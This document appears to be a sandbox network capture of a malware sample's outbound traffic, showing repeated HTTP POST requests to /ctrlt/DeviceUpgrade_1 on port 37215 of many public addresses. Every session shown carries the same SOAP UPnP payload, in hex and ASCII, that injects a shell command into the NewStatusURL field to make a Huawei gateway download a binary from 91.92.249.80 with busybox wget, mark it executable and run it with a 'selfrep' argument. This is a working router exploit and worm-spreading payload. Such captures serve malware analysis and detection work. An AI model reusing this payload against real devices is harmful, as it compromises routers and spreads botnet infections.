                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2043192.168.2.234888241.34.26.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597641945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2044192.168.2.2344488157.81.95.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597692013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2045192.168.2.2345722197.42.102.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597726107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2046192.168.2.2346496197.249.133.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597726107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2047192.168.2.2344526197.138.238.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597740889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2048192.168.2.235190041.233.98.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597748041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2049192.168.2.235650842.17.215.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598481894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2050192.168.2.234965841.210.84.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598623037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2051192.168.2.235125241.14.66.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598623991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2052192.168.2.2335250201.170.12.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598656893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
